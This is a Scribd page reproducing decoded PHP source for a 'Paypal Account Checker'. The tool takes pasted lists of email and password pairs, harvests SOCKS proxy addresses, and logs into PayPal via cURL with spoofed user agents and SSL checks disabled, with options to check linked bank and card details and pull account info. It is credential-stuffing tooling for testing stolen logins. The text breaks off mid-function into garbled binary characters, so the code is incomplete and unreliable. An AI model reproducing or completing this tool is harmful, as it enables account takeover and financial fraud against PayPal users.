0% found this document useful (0 votes)
187 views4 pages

PHP

This document contains PHP code for a PayPal account checker. It includes functions for making cURL requests, parsing response values, and checking PayPal accounts. The code displays a form where users can enter a list of PayPal credentials separated by a delimiter, then checks the accounts and displays the results.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
187 views4 pages

PHP

This document contains PHP code for a PayPal account checker. It includes functions for making cURL requests, parsing response values, and checking PayPal accounts. The code displays a form where users can enter a list of PayPal credentials separated by a delimiter, then checks the accounts and displays the results.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

/* Decoded by unphp.

net */
echo '...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3
.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<head><link rel="shortcut icon" type="image/x-icon" href="http://www.vhcteam.net
/VHC/images/inferno/icons/home.png"><title>Paypal Account Checker</title></head>
<style>
* body
{
background-color: rgb(74,81,85);
}
body,td,th {
color: #99CC00;
}
h2
{
color: #FFCC00;
}
h1 {
padding: 10px 15px;
}
.main-content {
width: 70%; height: 200px;margin: auto; background: rgb(74,81,85);
border-radius: 5px 5px 5px 5px; box-shadow: 0 0 3px rgba(0, 0, 0, 0.5); min-heig
ht: 340px; position: relative;
}
textarea, input {
border-radius: 5px 5px 5px 5px;
}
input {
height: 20px;width: 70px;text-align: center;
}
.button {
}
.submit-button
{
background: #57A02C;
border:solid 1px #57A02C;
border-radius:5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
text-shadow: 0 -1px 1px rgba(0,0,0,0.25);
border-bottom: 1px solid rgba(0,0,0,0.25);
position: relative;
color:#FFF;
display: inline-block;
cursor:pointer;
font-size:13px;
padding:3px 8px;
height: 30px;width: 120px;
}
.submit-button:hover {
background:#82D051;border:solid 1px #86CC50;
height: 30px;width: 120px; }
#show {
width: 70%;margin: auto;padding: 10px 10px;
}
</style>
<script type="text/javascript">
function pushSockDie(str){
document.getElementById(\'listDie\').innerHTML += \'<div
>\' + str + \'</div>\';
}
function pushPaypalDie(str){
document.getElementById(\'listPaypalDie\').innerHTML +=
\'<div>\' + str + \'</div>\';
}
function pushPaypal(str){
document.getElementById(\'listPaypal\').innerHTML += \'<
div>\' + str + \'</div>\';
}
function pushWrongFormat(str){
document.getElementById(\'listWrongFormat\').innerHTML +
= \'<div>\' + str + \'</div>\';
}
</script>
</head>
<body>
<div class="main-content">
<section id="main" class=""><center><h1>Paypal Account Checker</h1>
<form method="post">
<div align="center"><textarea name="mp" rows="10" style="width:90%">';
if ($_POST['btn-submit'])
echo $_POST['mp'];
else
echo '0|1|2';
;echo '</textarea><br />
Delim: <input type="text" name="delim" value="';
if ($_POST['btn-submit'])
echo $_POST['delim'];
else
echo '|';
;echo '" size="1" />Email: <input type="text" name="mail" value="';
if ($_POST['btn-submit'])
echo $_POST['mail'];
else
echo 1;
;echo '" size="1" />Password: <input type="text" name="pwd" value="';
if ($_POST['btn-submit'])
echo $_POST['pwd'];
else
echo 2;
;echo '" size="1" />&nbsp;
<input type="checkbox" name="bank" checked="checked" value="1" />Check Bank<inpu
t type="checkbox" name="card" checked="checked" value="1" />Check Card<input typ
e="checkbox" name="info" checked="checked" value="1" />Get info<br />
<input type="submit" class = "submit-button" value=" Check NOW " name="btn-submi
t" /> </br>
<center><h4>Copyright .. By Nuoc Mia - All Rights Reserved</h4></center>
</div>
</form>
';
set_time_limit(0);
include("use.php");
function curl($url = '',$var = '',$header = false,$nobody = false)
{
global $config,$sock;
$curl = curl_init($url);
curl_setopt($curl,CURLOPT_NOBODY,$header);
curl_setopt($curl,CURLOPT_HEADER,$nobody);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,random_uagent());
curl_setopt($curl,CURLOPT_REFERER,'https://www.paypal.com/');
if ($var) {
curl_setopt($curl,CURLOPT_POST,true);
curl_setopt($curl,CURLOPT_POSTFIELDS,$var);
}
curl_setopt($curl,CURLOPT_COOKIEFILE,$config['cookie_file']);
curl_setopt($curl,CURLOPT_COOKIEJAR,$config['cookie_file']);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
function fetch_value($str,$find_start,$find_end)
{
$start = strpos($str,$find_start);
if ($start === false) {
return "";
}
$length = strlen($find_start);
$end = strpos(substr($str,$start +$length),$find_end);
return trim(substr($str,$start +$length,$end));
}
$dir = dirname('index.php');
$config['cookie_file'] = $dir .'/cookies/'.md5($_SERVER['REMOTE_ADDR']) .'.txt';
if (!file_exists($config['cookie_file'])) {
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
$zzz = "";
$live = array();
function get($list)
{
preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/",$list,$socks);
return $socks[0];
}
function delete_cookies()
{
global $config;
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
function xflush()
{
static $output_handler = null;
if ($output_handler === null) {
$output_handler = @ini_get('output_handler');
}
if ($output_handler == 'ob_gzhandler') {
return;
}
flush();
if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_
length() !== false) {
@ob_flush();
}else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND fu
nction_exists('ob_get_length') AND ob_get_length() !?.U.BK&......
..O...(..>.

You might also like